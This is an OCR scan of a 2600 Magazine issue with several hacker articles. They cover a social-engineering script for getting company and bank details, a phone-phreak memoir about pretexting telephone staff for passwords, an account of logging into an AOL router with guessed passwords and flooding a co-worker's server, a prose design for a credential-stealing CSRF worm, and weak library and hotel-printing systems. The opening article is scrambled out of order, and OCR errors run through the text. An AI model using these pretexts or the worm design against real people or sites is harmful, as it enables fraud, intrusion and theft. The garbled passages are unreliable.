all I had was a post office box number! ( W e both had a good laugh at this).." I continued. If looking for information on someone: "Oh. I also want to make sure you've got my correct home address in case papers have to be served on me and that the company designation is correct so that I still qualify for tax rebates. I'm on the phone! What? Listen." The other kind of target is one who really isn't interested in helping you-they usually sound bored. so he can't help me. claiming that I was the director of the company I was investigating and that I had just received a call from someone who purported to be from Companies House telling me my company was going to be dissolved! "You can't do that! Without any legal papers or documentation?! What's going on?!" I tried to sound panicky. and 2) that Companies House could be social engineered to give out information. just in case. thanks. if you are at home and someone calls you up. I'll call back in a few minutes. eject." and she did what she could to help me. Mr. I've found that sob stories don't really work with these kinds of targets-they just aren't interested. I was just wondering if you might have an address for him?" "Yeah. like "uh-huh". Your company The woman told me all the details. really! Well. this can work to your advantage when your target is in a large building." Have an escape route prepared. For example. I told her that it was quite a relief. Ed needs me to fix his computer and he won't listen to me. which I jotted down. The middle one was the only one that I wanted and yes. "I've tried everything I can think of and. there's nothing to worry about. that's brilliant . the company's name.. and designation (this just clarifies the kind of business a company performs). Dunn got the fright of his life when the letter w e sent threatening court action arrived at his home address. saying "I was speaking to someone and got cut-off . Also. Normally. nobody's taking notice. but I was still a bit uneasy. "You're sure there's no way someone could've done something to the details? Could you just let me check the details are correct?" "Sure." and she explained to tell me the ways that a company could be dissolved (which I already knew). W e didn't want to go through all that rigmarole.. I have to call you back. but they charged quite a big fee and you had to be registered and cleared with them (at the time-it's so much easier and cheaper now for anyone to get information out of them).thanks a lot! This is the last time I call AT&T (or whomever)! Just before I go.. Not bad for a five minute phone call. here you are. they make uninterested noises. I don't know the number I'm calling from. I'll ask my supervisor and call you back." The other person in the office is helpful: "What's that.

In my opinion." They were simply dropped into the deep end to sink or swim with exactly zero experience in their job. before my arrival. ^ S p r i n g 2010 Page 25 -J . Three question and answers should be set by the customer to pick from. unless you know the reasons you're getting them. In a business context. under the guise of our being a charitable company (complete with made-up stationary and a bank account in its name). "In what year did Abner Podunk sprain his ankle?" Something that would be impossible to bluff and would immediately get the customer's attention if an attempt was made to engineer the answer out of them. here's the keys-get on with it. and seeing the photos she took at the school dance (so I could describe rooms in the place). the biggest hole that social engineers exploit in the business world is that management leaves it to the employee to decide for themselves the value of the information or. even worse. but something vague. Ask yourself: "Does this person have a right to know?" Does your phone company really need to know how many children you have? Does your gym need your email address? If they don't. important information like credit card numbers has to be available for the rank and file to see. four of the receptionists had recently left school and. It was always cashed. O n c e a court action was started. These criteria must be set by the highest level of management. To obtain a target's bank information. sorting code and name of the bank account of the target! Within half an hour. like the hotel industry. w e sent the target. I recently worked for a hotel chain. These sites can provide anyone with enough data to pull an engineering attempt off and are truly frightening in their potential. There were the bank account. I hasten to add). when they got the job. No matter how complex and airtight technology gets. You must be prepared to protect your personal information-shredding letters and bank statements to protect yourself against trashing and identity fraud (which is a different subject) is a good start. like credit cards. or damaging? A m I being asked to divulge information that I have been told must not get out?" And if they refuse because they are worried or unsure. Not " W h a t is your National Insurance Number (or Social Security Number)?". in numerous lines of work in the real world. pending the result of the court action). "No. this is 832600. they should not be penalized for doing so-higherups should take over and make a judgement themselves. However. performing admin and computer maintenance. " W h e r e is this conversation leading? Could the data I have be considered private. there has to be clearly defined criteria of what information can and cannot be given out and then who is acceptable to receive it. To let your customers down should be the last thing any decent business wants to do. dates of birth. but what about the information you voluntarily give out? W h a t personal information is there of yours on MySpace. should not be available for the average employee to see. Remember. people are always the weak spot. Did something odd come through the mail? It's a little off-topic. Any request should be referred to someone higher in rank and specially trained to detect social engineering.(able jiving out. proprietary. and the like. then don't give it to them. Ideally. a scam-artist happily social engineered over six guests' credit card numbers out of these kids. the latter is safer if you want to avoid social engineering (but you do tend to miss out on funny experiences that way!). Certainly. I was able to convince his 16 year-old daughter that I had attended the same school as she did-simply by looking at her Bebo account. M y name's Eric and there's never been a Mr. As a result. w e could perform a bank arrestment on dependence (freezing the money in the account. the individual employees must ask themselves. instructions were sent to officers of the court (bailiffs) to have their bank account frozen! But how simple it could be for someone to obtain your bank details using that technique! So be incredibly careful with checks." while others will just say. but one of the highest priorities w e had as investigators was to obtain the target's bank details. reading which school she went to. w e are talking about the private data entrusted to you by your customers. they were simply told by management. so that 1) it is organization-wide (everybody sings from the same hymn sheet) and 2) no wily engineer comes in and countermands company policy (alarm bells should ring if someone asks for infor-1 mation that the company never gives out over the phone)." N o policies explained. a check for £10. at least liability could have been prevented from reaching the hotel chain itself had management taken a little time to reinforce what is O K to share and what data needs to be protected. I heard that. W e then looked at our bank statement (using Internet banking). during every call or transaction if required. such as. "wrong number" and hang up. Facebook. if there is reasonable doubt as to their identity. the least likely can also be the most dangerous. Bebo or your own website? As an experiment to highlight the dangers of these things (and with my boss' full written permission. Some individuals feel happy saying. Goldstein living here. any sensitive data. This should include a "no-blame" policy if an employee has suspicions and refuses to divulge information to a customer. O n c e these guidelines have been set in place. W e are not just talking about private data. "here's the computer. Although it does sound like a complete lack of common-sense on the part of these youngsters. no "how to deal with complaints you receive" and no "basic security procedures with customer data. does not inform the employee how protected something must be. which nearly always forced a debtor to the negotiating table. Trust me. no health and safety reviews.

most phones had rotary dials.. If there's anything that can make anyone feel old. you used conveniently sized 8-inch floppies.. It was an Apple lie. and the Bells charged extra to let you use your pushbutton Touchtone™ phone. as he tightened the wires in my mouth. for about a year or so. but tapes reel to reel.) Most computer monitors were monochrome green or amber on black. for about $1200. if you happened to have access to Wang. The board of this game was the world's technological communications infrastructure. which was fine by me. Some were generic rip-offs like Munch-man or Tl Invaders. I got my first real computer with a dedicated green monitor. and V ^ Page 26 2600 Magazine ' . like my favorites: The B I O C Files. At 11 or 12. I loved text files by hackers and phone phreaks. Some of this information was spot on. Kind of like an elaborate kid's game played with very adult.but you read about that in your back issues of 2600. and a pretty good social engineer. I was the head of the Legion Of D o o m (LOD). loosely knit hacker groups like L O D or M O D were something of a farce . W e used a hole punch to double-side our disks. without a modem. whatever that means. M y dad used to talk about taking the subway to and from the movies. O n e game called Hunt the Wumpus let you save your sessions on a cassette recorder. W e bought it used. I read about hackers and they all had handles. Then w e had a few licensed games like Q-bert and Popeye. (Even now they're still available at http://cache. I needed a handle and at first couldn't decide between "Paperclip" and "Basketball Jones. It hooked up nicely to our color TV with an RF modulator. Data was no longer stored on cards. it's talking about the technology of their youth. (Or was it a dime?) I never wanted to sound old like my dad. the one that you leased from them at a premium .) These fueled my interest in the phone company and telephone networks by providing me with all sorts of secret telephone company numbers and tricks. I got my first computer.groups based upon w h o was the most elite hacker and w h o were his friends. Calculators had segmented red LED displays. I read about L O D and I knew I needed to someday join. I just kind of liked the way it sounded. while some was wild guesswork and fantasy. Hacking into computers and manipulating communication networks was fun and exciting.. seeing a double feature. Local calls were 10.cow. O h yeah. I would just hold the phone up to the TV and hit <ENTER>. I used to trade disks of games and printouts of bulletin board messages with other like minded students. W h e n I was a kid. You see. And I will never forget my favorite peripheral that snapped snugly into the side of the machine: the Speech Synthesizer. Later on. O n e afternoon I was sitting in my dad's study. It was the Tl 99/4A. talking on the phone. thumbing through my favorite pageturner paperback. real world pieces. Modems were expensive and they led to big phone bills. on account of not having a modem of my own. (My orthodontist excitedly told me that the makers of the VIC-20 were planning to produce a home computer that had a whopping 64 of these mammoth Ks. They were expensive too. A couple of years later. plug in a cartridge. W h e n I was a kid. Turn the TV to channel 3 or 4. surrounded by his vast collection of psychology tomes. phone phreak. W h e n I was a freshman in high school. in the 1980s I was a teenaged computer hacker.2 cents per minute. The way I see it in retrospect. and you never seemed to have enough for the project at hand." Not quite sure what the latter meant (I wasn't much of a sports fan). and getting a popcorn or lunch for a nickel. Most of the cartridges were games." it was on and ready to go. It wasn't until the next day that I was able to gain access and explore. dual floppy disk drives. Then there were the hard core computing cartridges like Statistics and Extended Basic. computers had memory measured in K. This was just made for late night prank phone calls. net/works/biocagent/. or. and a tractor feed dot-matrix printer. so w e could continue our adventures after the Star Trek reruns during sleepless sleepovers. People used to specify that TVs were color (we had a big one with a whopping 22-inch curved glass tube). by Bill from R N O C I was 14 years old the first time I convinced a supervisor at N e w York Telephone to happily give me their login and password to a sensitive computer system. like 99XX being a common ending for internal numbers.H a c k e r PersyJcfivi "boop. The Anarchist Cookbook.

These people knew how things really worked because they were the people inventing this hardware and programming these systems and they w e r e as close as your nearest public library microfilm reading room. I accidentally dialed 958-1022.) I started at the beast's public face. I signed on to a lot of (then) subversive BBSes at first. could be. Later. something as seemingly simple as telephone repair. and the U n k n o w n (X). So it was back to my father's den of higher learning for more inspiration where I had another vision. the public's w i n d o w into the A R S B was hidden behind another 3-digit code. long after they w e r e needed. These permitted free calls to my friends' houses.topbits. 411 for information. I convinced someone in a Remote W o r k Center ( R W C ) somewhere in Colorado to help install some 800 numbers.1 got chills. has been introduced at Bell Operating Companies" and within a page or two I knew that I had to become intimately acquainted with these computers. my voice and the telephone. the Automated Repair Service Bureau (ARSB).) The other way this journal really changed me is that it made me realize. 61. It took me a while to get a handle that stuck. w e also had 211 for the credit operator. just how complex. creme de la creme. W i t h a little trial and error I was able to figure out that 958 was the magic number and that 777-9807 was constantly busy because it was the number of the unmarked payphone I was on.^ Spring 2010 when my new handle hit me like a ton of books: Sigmund Fraud. I went to Peter's house almost every day. This was amazing and mind opening in many ways.com/anac-number.and lacked the wonderment that a phreak or hacker w o u l d embody w h e n they magically stumbled upon something. M a n y of these are still in service today. Back then. No. of the A R S B to see how things w e r e structured in N e w York. Since I didn't have a modem. In N e w York." a bumbling but kindly old w o m a n from AT&T. Probably thought up by the genius parents of the marketers that brought us its second generation successor Verizon (which I always thought should mean the Vertical Horizon . The downside was that the articles were often a little dry . w e knew what they w e r e for.html. 1 think I found out about it from a friend at school. and excitingly beautiful a network. just like my beloved A N A C . I remember reading some internal N Y N E X marketing paper explaining where their a w k w a r d name c a m e from. I used the biggest tools at my disposal. Google found a nice list of these for me here at: http://www. This time.a 300 baud AppleCat modem. 6. the Feature Croup B access code for Allnet. of sorts. but there was no Simpsons yet. Peter had a modem . meaning N e w York. and a disjointed mechanized recording interrupted and spoke in my ear: 7-7-7-9-8-0-7. Bell System. I remember it like it was yesterday. 660 in NYNEX-land as a test portal (that could make any phone ring after you hung up). still hopelessly intertwined. intricate. Part 2) hereby referred to as the ARSB BSTj. (just now. impersonating anyone or anything I met along the way. I came up with the handle Alter Ego. But where was I to begin? (No. I had a relative w h o worked at Bell Labs. W e all called these numbers A N I (Automatic Number Identification) because that's what it said in a text file somewhere. That one lasted a couple of months.more conjecture on my part). The problem was that Peter also liked the name Sigmund Fraud . H e was all "you sounded like a real pompous asshole on the X Y Z board" and I was all like "I never heard of that board. and their abilities to monitor circuits. They saw that I was interested in telephones and computers and gave me a present that changed my life on my 14lh birthday. I took to social engineering my way from the mailroom on up. W o r k i n g as old Mrs. and of course 911 for 911. As a phone phreak/computer hacker without a modem. W h e r e did the computers Page 27^ . G .just a tad . To really find my way deep into the repair world.a little too much . crystal clear. I didn't memorize the passage. The preface started: " A family of computer-based support systems. It seems that this 958 was the code for the Automatic Number Announcement Circuit ( A N A C ) in N e w York City. a fun alternative to school. The Bell System Technical Journal about the Automated Repair Service Bureau (july-August 1982 Vol. I could only sign on to BBSes from my friend Peter's house. But I soon learned that there were more places to derive inspiration from than just files. I did it from there. First being that the Bell System published technical works that were available to the public and not rife with inaccuracies and guesswork that B B S posts and textfiles were oft built upon. Grisby. w h e n I had things to hack into.and he started logging onto other boards and using my name. N e w England. For some of my earliest social engineering expeditions. Three digit codes were coveted internal portals to the world of the recently divested. It was indeed an acronym of sorts. where N Y N E X remained king of the telephones. before my voice had fully changed I went by the name of "Mrs. I needed to establish a map. just not what they w e r e called. This code was 611. Like the time I was quickly dialing 950-1033. These numbers generated no billing data and stayed in service for the next eight years." W e w o u l d have said " d ' o h ! " in unison. But I'm getting ahead of myself. but 26 years later I still keep the journal on the bookshelf in my office.

and zines being written by intrepid explorers. Eventually. This is long before trying to diagnose your trouble by continuing to use their patented prompt/menu service to raise your blood pressure all the while. The first nugget of info I gleaned was an internal direct dial number for 611. or from previous phone calls. I was told there was no trouble-ticket registered for that number. I w a s aided along by having much of my information of the blanks and gaps filled in with terminology from the A R S B BSTJ. a number ending in 9941 where the operators sat. my 9941 number to the repair service operator still works to this day. and then I w o u l d call as the technician again. I ended up getting an Apple Cat 300 baud modem around the time I found the handle that stuck: Bill From R N O C . you can look back at the role and place that technology and technological change had in your life and feel old too. W h e n it expires. Next. kindly interrupts to say that you now need to dial 1+ your area code first. I slowly got numbers for the rest of the departments. social engineering. Look it up. system names. This was my first successful social engineering mission. because I was getting paid to be sneaky and clever. Finally. Later. For starters. and locations. I gained another nugget of information. they stay the . (There had to be at least one of us. I'd love to tell you how things turned out. 611 no longer gets you to an operator. lucky for me. blogs. I stopped breaking the law w h e n I was dragged d o w n by its long arm. which. A n d eventually. given some time. "John from Repair" (a very brief handle I used) and his "coworkers" were able to discover a w e b of information by using this and other very simple ruses. long after I got in trouble." From the hacker's perspective I feel that I've lived in interesting times. I promise to tell all. Luckily. before putting you into a voice prompted system that proceeds to take you for a long ride. spoofing. and I'm grateful for all the past phone numbers and passwords that still float around in my memory long after my call has been terminated . W h e n I was in my mid 20s. W i t h each subsequent call. but I'm still under nondisclosure. A lot has changed in the world of repair service in this quarter of a century. This time. ^ Page 28 As much as things change. N o matter how old or young you are. when called. but a recording that tells you to dial 890-6611. That w a s the start of the confusion. than when I was younger. it's mighty hard to hide a parking lot or a central office building. I graduated to computer dial-up numbers for PDP-11 front-end systems in the computer operation centers. I got back to my roots by forming a computer security consulting firm with some old hacker buddies. as fun. and corresponding accounts and passwords. He first wrote for 2600 in November of 1986 under 2600 Magazine de' yet another nom ^ Page 28 plume. whether it was owning a cell phone that lacked the ability to send S M S or text. he w o u l d repeat " H e l l o Blimpie" ad infinitum until w e w o u l d hang up because our sides hurt from suppressed laughter). There are still dry technical documents to inform and whet the appetites of curious minds. right?) I was dispatched out of Sheepshead Bay on a repair for a random number that I made up. you get a recording telling you that in the future all of your needs can be met by dialing 1-8OO-VER-IZON. or hear a recording stating that your call is being monitored for "quality purposes. if not more fun. There are still plenty of stories and articles. as the curse goes. without the need to dial through endless messages. A n d it was here that I did the ultimate feat of social engineering. I said I w a s a repairman named John from Repair. posts. downloading a song over your dial-up connection using the original Napster or Kazaa.live? W h e r e did the operators sit? W h e r e were the repairmen dispatched from? W h e r e did they park their trucks? W e l l . same. back-end access to mammoth mainframes. trashing. when I helped convince a large wireless telephone company to hire us to pull a no-holds-barred external hacking audit/penetration test . I could see a large lot from the subway by Sheepshead Bay with about 100 or more vans that all looked strikingly to the 2600 van that later toured the nation in Freedom Downtime. borne from the same roots as John From Repair. but I never stopped thinking like a hacker. war dialing. I said I w o u l d check with my foreman and get back to them. Bill from RNOC is one of the many names of this New York City based multi-hatted hacker cum artist/filmmaker. or even turning in your first program to your college professor on 563 sequentially numbered Hollerith punch cards. and good old-fashioned hacking. a repair office based in the borough of Queens. if you dial 1-718-890-6611. I picked the number for a local Blimpies restaurant (this was a gross fast food joint that was fun to prank call because of the way this one guy w o u l d always answer the phone in a heavily accented " H e l l o Blimpie" and every time w e "said" a random w o r d with my Tl speech synthesizer. I had an idea. but was not limited to.and that the urge to figure things out remains strong. then branched out to the supervisors' office numbers. For one thing. Bill was a guy I talked to w h o worked at one of AT&T's Regional Network Operations Centers. The included.a full scale attack on their facilities from the outside. And it was a fucking blast. I w o u l d call and made a report of telephone trouble for a number that I knew.

M y job as a Unix systems/network administrator and programmer. O f course I was called into the office to explain how I created a fake post using this person's IP address. After some investigation the P H B s discovered that indeed. Most people still had open telnet servers on the Internet. In this article. no one else ever messed with me too much but it was a black mark on me as far as management w a s concerned. M y friends. have done something consider hack-worthy. Since I trusted the person I thought was messaging me. I am average. They were correct. I use darknet chat systems with my close techie friends. I can honestly say I have only worked 1/2 of my life. I checked the name servers. lo and behold. I found out an hour later from the real user what had happened. it didn't work right. To me. a few trusted co-workers and friends. thought it was hilarious. ranging from the less and less important hardware to the nowadays more commonplace activity of shoehorning all sorts of software to work correctly (that is not to say that I have never shoehorned hardware). The Jerk Off Co-worker scenario V Spring A long time ago. Note that while this is not The Jerk Off Co-worker Reactions 2010- -Page 29^ J . The article will use three real world examples and cover how different types of people interpreted them. I w a s using I M and. I could have at least been fined and possibly worse. security on networks was nowhere near where it is now. I promptly pasted the U R L to several other co-workers' I M sessions full-well knowing what w o u l d ensue. I took a quick glance at the routing tables and then logged out. Strangely enough." I am not a great hacker. on a system in my small apartment. but for some reason I thought it w o u l d be okay since everyone at work used it. I jumped into a shell and fired up my B S D T C P stack (because my crappy O S didn't have its own) to examine the routing tables. so I did a search for the jerk-off's name on the W o r l d W i d e W a i t and. It was so long ago that I got the floppies in the mail. I took a few guesses. so I telnet'd to the address and got a router login prompt. Positiues. Most of the time. requires having a wide variety of mediocre hacking skills. using typical admin passwords. this article discusses the positive and negative impressions other people get when they find out you. at the time. I had just started working there and this person told m e that I w a s probably going to be let go. the jerk-off co-worker had made the post. hijacking someone's system w h i l e they are gone is almost the worst offense you can commit. I was assigned an address and what looked like a proper netmask (class C address with a 24 C I D R mask). buried deep in the results I found something both hilarious and somewhat disturbing. I am not a bad hacker. but something still seemed off. and eventually logged in. the rest of the time I was having fun (what others call work). It also just so happens that hacking and making are hobbies of mine. he had left a post on a pantyhose bulletin board while he w a s at work (they logged IPs). I allowed the people where I worked to get my nick. I believed it. though. ranged J from indifferent to blaming A O L for being idiots. O n c e I w a s in. 1 wasn't sure. Yes—it makes work fun if you remove the humans.The Hacker Enigma: by pantos Some of you may know me from my writing about slapping content switches around. but resolution wasn't working. for those w h o are familiar with the field. Negatiues and UJho Knows? The AOL Router Reactions Reactions from the few people I told. A co-worker went over to another co-worker's station while he was out working on a problem and assumed his identity. O f course... for real conversations. From that point on. my gateway was not set. I told my managers to contact the admin and they w o u l d see it was a legitimate post from our address on a night I was not at work and was not logged into the V P N . I was trying out a free America Online (AOL) dialup access trial. I took a few guesses at what the gateway was and got one that appeared to be correct. I take a detour to discuss some of the positive and negative effects of "being found out. yes you. of course. The AOL Router Scenario I was-displeased. for some reason. Being AOL. Although I did nothing wrong under today's laws. I realized I should probably log out. O f course. Taking into account that I am honestly curious and sometimes a bit too willing to just try stuff. O n e evening.

it was a form of social hacking.he (along with several staff members) c a m e to m e to perform this miracle. I told him to get me a signed document from his manager saying it was okay. For example. are all hip. So first. These days. Summary and Thoughts A N INTRODUCTION TO CSRF ATTACKS by Paradox There was a time (not that long ago) that cross site scripting (XSS) attacks were relatively unknown. There was always a little suspicion. Fortunately. After a few minutes I could hear the guy banging keys.net platform even includes XSS prevention support! Unfortunately. In another life I worked in an IT shop that had a developer w h o liked to buy whatever he felt like. This might seem strange at first. B e careful w h o m you tell and what you agree to do. I complied. The proof of concept was very carefully neutered Page 30 and. so much so that he wanted to play a practical joke on the guy that was "as frustrating to him as possible. but hacker beware to whom ye boast. The information is out there and. the administrator of the site was notified in a manner upholding the tenets of responsible disclosure. The Intentional Denial of Service Reactions The gist of these cases is simple.hacking. M y coworkers thought it was funny and understood the mechanics of what I had done. that time has long since passed. as you try to comprehend an admission to writing code of the nature described above.. Other attacks still remain less well known outside of the security community. when the attack was proven feasible. The hole has since been patched. The developer in question w a s running A p a c h e on their W i n d o w s 2000 workstation (as part of the O r a c l e forms suite). I loaded the hydra on three different Unix servers and then wrote a wrapper that spawned about 2000 instances of it. All is not lost. right? Have 2600 Magazine ' . Naturally you would need a way for authenticated users to log out. plenty of material exists to teach you defenses. There is no excuse anymore for writing code that is vulnerable to XSS attacks (at least the basic ones). swearing then finally shutting his system The Intentional Denial of Service Scenario d o w n since it became exhausted. slamming his mouse down. The following is a learning text based on an actual vulnerablity in a real website with a working proof of concept: a CSRF worm that steals account credentials! A bit of explanation is probably in order at this point. M y manager (who was also responsible for provisioning the developers) w a s pretty upset at this person. I dare say. grumbling. Let me reiterate: this worm never spread past my accounts. using his corporate card and without asking for permission. The problem with this approach is that it is probably performing an action when the user CETs the relevant script without veryfing that it was the user himself that sent the GET request. The developer w h o m I pranked was let go a week later. Everyone was quite pleased and thought it was funny. A friend of mine asked me to pen-test his corporate firewall last year. average coders are hearing about it. so that he can feel my pain" . The basic idea of a CSRF attack is that it is possible to force authenticated users to perform actions in an automated fashion without being authenticated yourself. The first example usually given to describe CSRF is the idea of a server-side script that performs an action of some sort when it receives a GET request from the user.php script that. so no one thought it was particularly eccentric or great. but they never quite treated me the same afterwards. with XSS taking the spotlight. M y geek friends. W e b developers could be excused for not properly sanitizing inputs. of course. Via a GET request the browser performs.. but think about how images are loaded for an <img> tag. A popular approach is to have a logout. I figure the best way to learn is from a real life example. logs him out. when loaded by the user. I found a nice perl program that could hydra http gets and leave a custom message in the logfiles. as is the 2600 crowd. developers feel like they are writing secure code when it is merely XSS-resistant. Microsoft's ASP. I am very wary about w h o m I tell this sort of thing to (I have told no one at my current job) and even more about what I do for people. The fun part was I disguised my IP with o n e of the D H C P dial-in pool addresses. imagine you had written a website with a members only section. and I would like to commend the owner on his prompt and courteous dealings with me. per se. however. O n e of the prime examples of this is the cross site request forgery (CSRF) attack. the concept of the exploit.

com and pass that as a parameter to the news. This is also true! The problem is that the vast majority of server-side scripts will gladly accept a POST from outside of their domain. Victory is ours! So with that theory in mind. but they control the destination for your GET request based on the address of the resource! form. It's a bit tedious. the user never sees the response sent for the POST.php link you distribute. The second P O S T sets the target account's registered e-mail to one under my control. however. It decodes a parameter to the script that is base_64 encoded to be non-obvious. Anyone that loads that "image" tag would have a GET request sent to logout. c o m / l o g o u t . who are also likely to then be exploited. can automate this process for you. The browser never does this automatically for things like images or other html elements.php also contains a Javascript section that creates a function "crossDomainPost" that embeds an iframe (created with form_writer. So after seeing how easy it is to create a password stealing w e b worm.. but most good w e b frameworks. The third and final POST is the fun one. It then creates an iframe that loads that base_64 decoded string as the target url. It makes luring someone to the site all that much easier! Simply base 64 encode something like http://www.php is the meat of the exploit. using the credentials of the authenticated user. The server-side processing for that script should then only perform an action when it receives that secret. I'd also like to point you to: h t t p : / / The impact of this immediately becomes clear when you think of an image tag that. To make this work. points to h t t p : / / y o u r s i t e . right? It's true.com. News. It contains a clever way to convince a target that he isn't being tricked.s h a d o w . It forces the user to update his "status" with a link pointing back to the exploit. For one thing. You can see how quickly that could spread if it were left unchecked. it's vital that the secret changes for every request. If that person happens to be logged in at yoursite.you ever had to click a box to allow an image to be loaded? I think it's safe to say no! Can you imagine having to allow every image on the page. this line of thinking is eliminated when you realize that POST based forms are just as vulnerable! It's not immediately clear how this could be the case. So. to make it less obvious. This allowed me to invoke the password reset function and have the "forgotten" password sent clear text and unhashed to my e-mail. Don't be fooled into thinking that merely checking the referer header on every POST is good enough.. I'm sure you are eager to learn how to prevent it. by making them 1 x1 in size. then his cookie would be dutifully passed along with the GET. :) Until next time! Be safe. W h e n paired with Javascript.google. Suprising? The tricky bit is that you should now consider that other people are invoking these GET requests when they embed images and things of that nature. This allows the one script to quickly perform three POSTs to the server. The first post leaves a tracking comment in my inbox. It's not really that hard. The traditional way to do this is to embed a "secret" inside every form you present to the user. N o point in reinventing the wheel. Not only that. then you can exploit the script. after all. If the secret is random. p h p . it allows sites to perform API requests across domains. You might think that by preventing XSS you would prevent such Javascript from being executed and submitting the form. it's trivial to submit a POST-based form automatically. The Javascript will execute and the form will post to the action located on the target server. one at a time? So your browser already makes GET requests on your behalf without asking. The beauty of using iframes to contain the form submit and Javascript is that. form_writer. So when a user is exploited he advertises the exploit to his friends. such as Struts or CakePHP. The beauty of this is that it allows us to to convince the user that he is viewing a regular website while our exploit code submits the • w . then the only way to exploit the script is via an XSS attack that lets you first gain access to the secret. with Flash and other exploits it can be possible to fake a referer. via POST. instead of pointing to a jpg or a gif. the data contained in the last argument to crossDomainPostO. It's bad form! Unfortunately. The script probably has no idea where the POST came from! This is a feature of the web. and practice responsible disclosure! ^ Spring 2010 • Page 31 • .php at yoursite. I've modified it into a specific exploit for the purpose of this article and integrated the aforementioned trick. W h a t do you think would happen then? It's easy to dismiss this example. It gets loaded into the tiny iframe and is effectively hidden. POSTs don't usually happen automatically. You can't easily force a POST request on behalf of the user.php) that will submit. it's against web development best practices to perform A N Y action on a GET request.php and the crossDomainPostO function were taken from that blog post. and only when you are expecting it. w e just have to lure an authenticated user to the site. The basic idea is that you need your scripts to verify that the person they authenticated is the person submitting data. c o m / b l o g / 2 008/11/2 0/ *»cross-domain-post-with- • j a v a s c r i p t / .com. If you can predict the secret. if w e merely create a website on our own server that has a form w e want to post on behalf of the user and some Javascript to do the posting. onto the real deal! The first file: news.

It is used in thousands of libraries all over the world. not a warrant. Voyager uses Oracle for its main database. so they can figure out what books you've checked out. nor is it related to patron records. which LC number to give it. the federales can bust into a library. wave an NSL (a National Security Letter. nor that this data is being stored in it. information about books. but the Patriot Act is not dead yet-it comes up for renewal in late 2009. The NSLs are dying after the ACLU sued the government. author. but it doesn't. Voyager installs usually have ridiculously simple passwords. they can upload the information. It should erase records of what's been checked out after the books are returned. date. go to Google and type in "site:voyager. Really? Yes. Besides. non-profit.. Yeah. Addresses and phone numbers.. carelessness. Most library administrators think SQL is "that Microsoft thing" and databases are "like MS Access. The funniest thing about that last table is that the library administrators. folks. stupidity. If you want to really commit a big crime. The first tables are the "bibliographic data" tables. sorting title. They really do. So there you have it. journals.*. free library loving OCLC. the LOC subject classifications. you don't need my article for help. but made by experts with decades of experience." for circulation functions like checkin/ checkout. I don't want you to h4xor it. You don't need to worry about enemies of the country destroying your freedom. Well. "Voyager Cataloging" for cataloging functions. too. Page 32 ^ Page 32 2600 Magazine ' . and what kind of trouble we can get into while accessing it. The one I worked on had the name of the school as the password. insecure passwords.edu" That will give you a general idea of the install base. There is nothing in the instructions that points out what this table does.. There is absolutely nothing in the "Voyager Windows Interface" that interacts with this table. right?" IP address? "It's that number on the outside of your case. except. the librarian had to hunt down which categories to put it in. etc. What other crimes can be committed with this database? Well. But that's not all it does. and many of them tend towards inveterate boot licking.V o y a q a r L i b r a r y i n f o r m a t i o n S y s t a m by Decora The Voyager Library Information System is made by the Endeavor corporation of Chicago. take all the data they want. that you paid for with your tax dollars. publisher. then what can be done with this system? Well. and corruption. . And I haven't even mentioned what might go on outside the USA. So what? Well. ignorance. For a good list. a lot of library administrators are just as ignorant of the law as they are of databases. and. Under this law. url. that brings me to my final table. videos.. By copying bibliographic records out of a library database. That is. Thank god people with links to the Russian mafia never get jobs in libraries. Now forget about petty crimes. I find it a bit humorous that us users must choose elaborate passwords but systems costing taxpayers tens of thousands of dollars get away with five letter. Give OCLC the ISBN and it returns all the data on the book. while OCLC has been trying to claim copyright ownership of all the user-generated content that librarians have submitted to it over the years. If there isn't already a record. like being a government agent and violating someone's constitutional rights. Voyager's database keeps the records for years. etc. it stores the words "Mark Twain" in the database table. You know.. I can't t imagine that happening on a university campus. librarians download most of the data from some pre-made source like the Online Computer Library Center (OCLC). But not just what is currently checked out. Dumb schools keep the SSN of their patrons in the database. where you checked out 30 books on revolutionary communist guerillas. you are "stealing intellectual property" of the ailmighty. and 24 books on erotica-yeah. I want you instead to be aware of the stupidity of our government and corporate leaders. This database table actually stores queries that are made through that web interface. The password on the Oracle database is equally stupid. I'm not giving specific details about how to h4x0r it. seriously. etc. There is a table that is not related to bibliographic records. 17 books on psylocibin mushrooms. who spend tens of thousands of your tax dollars on this product. Just rely on good old-fashioned bureaucratic incompetence. If you have the brains to h4x0r it. So if you look up "illegal wiretapping" or "the fourth amendment" from your computer. So here we have committed our first act of treason against the ailmighty state. Ok. If your teacher ordered some obscure book and put it in the library. v Oh wait. nowadays. the thing you are greeted with when you go to look up a book on a library kiosk or from home.. Now for what Voyager stores. No. It is also used in government agencies (such as the National Park Service) and probably some corporations. that's all in there. Title. the real gem. etc) does not ever give the full picture of what is in the database. It also stores the IP address of the computer that you searched from and the date the search was performed. it will store all of that information in the database. so no reason is required). It's like a giant Wikipedia of bibligraphic data. It has to do with the "web interface" to Voyager. you can obviously learn what books someone has checked out. But where does OCLC get that data? From librarians. Illinois. too. The "Shitty Windows Client" Voyager software that library clerks use (clever titles: "Voyager Circulation. and none of the library employees are allowed to say that it ever happened. probably have no idea that this table even exists. we also have patron records. If you type in "Mark Twain" as a search. especially not to a lay person unacquainted with snooping around databases. right?" Let me finally mention the Patriot Act. W h o inputs all that information? Cataloging librarians. Except that Wikipedia uses the G N U Free Documentation License. So that phase you went through as a freshman.

still at the mercy of the human employees and the local network at the facility that you are printing to. They do ask for a name and an email address. You have the DocID. mirrorshades. Ohm. you upload your file to the web server and it gets relayed down to the PrintMe device that you chose earlier. but not all places wait until they get confirmation to print the document. I am printing a test page to a hotel in another state. As I write this. This is accomplished by looking for a piece of hardware called a PrintMe Station. and some FITML formats. Shoutz: Aghaster. a major hotel in Las Vegas) usually has a splash page for the site that includes a link to the domain p r i n t m e . I was able to upload a 250 M B video file by renaming it to PDF. You could print something and bill it to someone else's room and. the specific location. This means that you can print to any printme eligible location from literally anywhere in the world. This will protect your document in transit over the Interweb from man-in-the-middle attacks. The first interesting opening is that it doesn't lock you to your local hotel.'"Print Me?" Why thank by StankDawg (StankDawgC«stankdawg. I was not able to physically access this device so I can only guess as to the details of how it worked by trial and error. I wonder if they would deliver something called tubgirl. Also. it assigns you a unique " D o c I D " that you may need to pick up your print file. they will not bother checking very closely and you will get a free printout billed to someone else. as I mentioned earlier. just pointing out the possibility. Obviously. EFI does encrypt all transfers to its devices via 128-bit SSL and an activation code is used to verify that the device is who it claims to be. instead. There are some good parts of the system. This is not EFI's fault. it does not stop a DoS type of attack by filling up the hard drive with renamed files. the city and finally. of course. what you print may be more insulting than the cost to print it. This is accessible (at least at my hotel) without paying for Internet access. the web site will present you with a list to choose from by selecting the country. which is apparently how the 